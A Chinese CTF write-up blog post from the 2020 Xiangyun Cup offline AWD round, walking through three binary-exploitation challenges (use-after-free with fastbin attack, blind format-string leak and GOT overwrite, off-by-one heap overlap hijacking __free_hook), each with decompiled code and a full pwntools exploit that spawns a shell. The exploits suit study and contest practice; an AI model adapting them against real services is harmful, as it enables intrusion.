2020祥云杯线下

2020-12-19

字数统计: 1.7k字 | 阅读时长≈ 9分

祥云杯线下，断网环境下很多东西记得不是很牢固，需要自己一点点试，说明基础还是有点缺陷，需要弥补。

AWD

pwn1

程序分析

unsigned __int64 magic()
{
  unsigned __int64 idx; // rax
  _BYTE *v1; // [rsp+0h] [rbp-20h]
  int v2; // [rsp+Ch] [rbp-14h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  printf("Index: ");
  idx = get_int();
  v3 = idx;
  if ( idx <= 0x10 )
  {
    idx = (unsigned __int64)*(&chunks + idx);
    if ( idx )
    {
      idx = *(_QWORD *)*(&chunks + v3);
      if ( idx )
      {
        idx = mark;
        if ( mark )
        {
          printf("Content: ");
          v2 = read(0, (char *)*(&chunks + v3) + 8, 0x69uLL);
          v1 = (char *)*(&chunks + v3) + v2 + 15;
          if ( *((_BYTE *)*(&chunks + v3) + v2 + 7) )
            *v1 = *((_BYTE *)*(&chunks + v3) + v2 + 7) & 0xF;
          else
            *v1 = 1;
          idx = --mark;
        }
      }
    }
  }
  return idx;
}

程序漏洞很明显，删除堆块时，没有将堆指针清空。然后存在一个 magic函数，可以实现 uaf。

利用分析

这里，我们先利用堆合并，再构造一个堆重叠。利用 fastbin attack分配 fake_chunk到 size_list中，因为 size_list中已经有了我们分配的堆块 size。

最后getshell，是通过覆写 got 表。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

filename = './pwn'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def add(idx, size):
    p.sendlineafter('Your choice: ', str(1))
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('size: ', str(size))

def edit(idx, content):
    p.sendlineafter('Your choice: ', str(2))
    p.sendlineafter('Index: ', str(idx))
    p.sendafter('Content: ', content)

def show(idx):
    p.sendlineafter('Your choice: ', str(3))
    p.sendlineafter('Index: ', str(idx))

def delete(idx):
    p.sendlineafter('Your choice: ', str(4))
    p.sendlineafter('Index: ', str(idx))

def magic(idx, content):
    p.sendlineafter('Your choice: ', str(666))
    p.sendlineafter('Index: ', str(idx))
    p.sendafter('Content: ',content)

def Pwn():
    p.sendlineafter('>>\n', str(2))

    size_addr = 0x602120

    for i in range(4):
        add(i, 0x80)

    add(5, 0x81)
    for i in range(6):
        add(6+i, 0x81)

    for i in range(3):
        delete(i)

    add(11, 0xd0)
    payload = 'a'*0xb0
    edit(11, payload)
    add(12, 0x70)
    gdb.attach(p, 'bp 0x400e5d')
    delete(12)

    payload = 'a'*0x38+p64(0)+p64(0x81)+p64(size_addr)
    magic(1, payload)

    add(0, 0x70)
    add(1, 0x80)
    add(3, 0x70)   #fake chunk

    puts_got = elf.got['puts']
    payload = '\x00'*0x48+p64(puts_got)
    edit(3, payload)
    show(0)
    puts_addr = u64(p.recvuntil('\n',drop=True).ljust(8, b'\x00'))
    print('puts_addr:',hex(puts_addr))
    libc.address = puts_addr - libc.sym['printf']
    print('libc_base:',hex(libc.address))
    system_addr = libc.sym['system']

    atoi_got = elf.got['atoi']
    payload = '\x00'*0x48+p64(atoi_got-8)
    edit(3, payload)
    payload = p64(system_addr)
    edit(0, payload)

    p.sendlineafter('Your choice: ', '/bin/sh\x00')
    p.interactive()

Pwn()

pwn2

解题

程序分析

这道题是一个盲pwn，漏洞也是盲Pwn常见的格式化字符串漏洞，使用 wiki上给的dump二进制文件脚本。先得到文件主程序的二进制文件。结合分析后，就能够得到 read_got和puts_got，这样我们就能够利用格式化字符串修改返回地址来泄露地址和覆写got表。

利用分析

dump二进制

这里需要确定我们泄露二进制的开始地址，通常我们是从 0x400000开始泄露。如果我们为了确认，可以多次泄露栈地址，我们会看到两个相同的 plt地址，该地址是 lbc_start函数的返回地址，通过它我们也可以确定我们开始泄露的地址。

修复二进制

导出的二进制，我们直接放入IDA是很难识别的。我们需要修改其加载基址，然后我们可以通过上面泄露的返回地址，先确定main函数的地址和start函数的地址，最后生成部分函数段。

通过函数段，我们能够大概猜到部分系统调用的地址，这样就能够确定 got表的地址。

getshell

盲pwn一般很少有开PIE，而且应该是允许直接覆写got表来getshell。

EXP

#coding=utf8
import math
from pwn import *
#from LibcSearcher import LibcSearcher
context.log_level = 'debug'
context.arch = 'amd64'
ip = "172.20.2.8"
port = 15865

def leak(addr):
    # leak addr for three times
    num = 0
    while num < 3:
        try:
            print 'leak addr: ' + hex(addr)
            sh = remote(ip, port)
            payload = '%00008$s' + 'STARTEND' + p64(addr)
            # 说明有\n，出现新的一行
            if '\x0a' in payload:
                return None
            sh.sendline(payload)
            data = sh.recvuntil('STARTEND', drop=True)
            sh.close()
            return data
        except Exception:
            num += 1
            continue
    return None

def getbinary():
    addr = 0x400000
    f = open('binary', 'w')
    while addr < 0x401000:
        data = leak(addr)
        if data is None:
            f.write('\xff')
            addr += 1
        elif len(data) == 0:
            f.write('\x00')
            addr += 1
        else:
            f.write(data)
            addr += len(data)
    f.close()

gadgets = [0x45226, 0x4527a, 0xf0364, 0xf1207]
#getbinary()
read_got = 0x602038
printf_got = 0x602028
p = remote('172.20.2.8',15865)
libc = ELF('./libc.so.6')
# let the read get resolved
#sh.sendline('a')
p.recvuntil('this is 1 floor\n')
# get printf addr
payload = '%00008$s' + 'STARTEND' + p64(read_got)
p.sendline(payload)

data = p.recvuntil('STARTEND', drop=True).ljust(8, '\x00')
p.recv()
read_addr = u64(data)
print("read_addr:",hex(read_addr))
#print("stack_addr:",hex(stack_addr))
# get system addr
#libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.sym['read']
system_addr = libc_base + libc.sym['system']
printf_addr = libc_base + libc.sym['printf']
log.success('system addr: ' + hex(system_addr))
log.success('read   addr: ' + hex(read_addr))
log.success('printf_addr:'+hex(printf_addr))

gadget = gadgets[0]+libc_base


lowAddr = system_addr & 0xffffff
highAddr = system_addr >> 32
addr1 = lowAddr & 0xff
addr2 = lowAddr >> 8
addr3 = highAddr

p.recvuntil('this is 2 floor\n')
p.sendline('a')
p.recvuntil('this is 3 floor\n')

payload = "%"+str(addr1)+"c%9$hhn"
lens1 = len(payload)
payload += "%"+str((addr2-addr1)&0xffff)+"c%10$hn"
payload = payload.ljust(24,'\x00')
payload += p64(printf_got)+p64(printf_got+1)
#payload = p64(0x602028)+p64(0x602029)+"%"+str(16)+"c%6$hhn"+"%"+str(0x36a8-0x10-26)+"c%7$hn"
p.sendline(payload)

# get shell
p.sendline('/bin/sh;')
p.interactive()

pwn2

程序分析

unsigned __int64 __fastcall sub_B00(__int64 chunk1, unsigned int size)
{
  unsigned int i; // [rsp+10h] [rbp-10h]
  char buf; // [rsp+17h] [rbp-9h] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  buf = 0;
  for ( i = 0; i <= size; ++i )                 // off-by-one
  {
    read(0, &buf, 1uLL);
    if ( buf == 10 )
      break;
    *(_BYTE *)(chunk1 + (int)i) = buf;
  }
  return __readfsqword(0x28u) ^ v5;
}

漏洞很简单，edit函数存在 off-by-one漏洞。

利用分析

这里用一下我看 blue_sheep师傅很喜欢用的一个小技巧，就是在布置堆重叠时，不用繁琐的计算下一个堆块的堆头，我们直接将下一个堆块全部用 p64(0x20)+p64(0x21)给全部填满，这样当我们修改了上一个堆块的堆头后，都不会出错。

EXP

from pwn import *
context.update(arch='amd64',os='linux',log_level='debug')
context.terminal=(['tmux','splitw','-h'])

filename = './pwn'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def add(idx, size):
    p.sendlineafter('Your Choice\n',str(1))
    p.sendlineafter('index>> ',str(idx))
    p.sendlineafter('size>> ',str(size))

def delete(idx):
    p.sendlineafter('Your Choice\n',str(2))
    p.sendlineafter('index>> ',str(idx))

def edit(idx, name,flag):
    p.sendlineafter('Your Choice\n',str(3))
    p.sendlineafter('index>> ',str(idx))
    if flag == 1:
        p.sendlineafter('name>> ', name)
    else:
        p.sendafter('name>> ', name)

def show(idx):
    p.sendlineafter('Your Choice\n',str(5))
    p.sendlineafter('index>> ',str(idx))

def Pwn():
    add(0, 0xf8)
    add(1, 0xf8)

    add(5, 0xf8)
    add(6, 0xf8)
    add(2, 0x58)
    payload = p64(0x20)+p64(0x21)
    edit(1, payload*0xf, 1)
    # gdb.attach(p, 'bp $rebase(0xf88)')
    payload = 'a'*0xf0+p64(0x100)+'\x51'
    edit(0, payload, 0)

    delete(1)

    add(3, 0xd8)    #1
    add(4, 0x48)    #fake chunk

    delete(3)
    payload = 'a'*0x48
    edit(4, payload, 1)
    show(4)
    p.recvuntil('a'*0x48)
    libc_addr = u64(p.recvuntil('\n',drop=True).ljust(8, b'\x00'))
    libc.address = libc_addr - 88 - 0x10 - libc.sym['__malloc_hook']
    print('libc_base:',hex(libc.address))
    free_hook = libc.sym['__free_hook']
    system_addr = libc.sym['system']

    payload = 'a'*0x10+p64(0)+p64(0x21)+p64(0)*3+p64(0xe1)+p64(libc_addr)
    edit(4, payload, 1)
    add(1, 0x68)
    add(8, 0x48)
    #pause()
    payload = p64(0x20)+p64(0x21)
    edit(6, payload*0xf, 1)
    #gdb.attach(p, 'bp $rebase(0xf88)')
    payload = 'a'*0xf0+p64(0x100)+'\x61'
    edit(5, payload, 0)

    delete(6)

    add(6, 0xd8)
    add(7, 0x50)    #fake chunk

    delete(6)
    payload = 'a'*0x10+p64(0)+p64(0x21)+p64(0)*3+p64(0xe1)+p64(libc_addr)+p64(free_hook-0x1d-0x8)
    edit(7, payload, 1)

    add(6, 0xd8)
    delete(1)
    #gdb.attach(p, 'bp $rebase(0xf88)')
    payload = 'a'*0x10+p64(0)+p64(0x21)+p64(0)*3+p64(0x71)+p64(free_hook-0x18)
    edit(4, payload, 1)
    print("=========> getshell")
    add(6, 0x68)
    delete(8)
    add(3, 0x68)    #free_hook
    payload = 'a'*8+p64(system_addr)
    edit(3, payload, 1)
    edit(6, b'/bin/sh\x00', 1)

    delete(6)
    p.interactive()

Pwn()

本文作者： A1ex
本文链接： http://yoursite.com/2020/12/19/2020祥云杯线下/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！

AWD

pwn1

程序分析

利用分析

EXP

pwn2

解题

blind_pwn

程序分析

利用分析

EXP

pwn2

程序分析

利用分析

EXP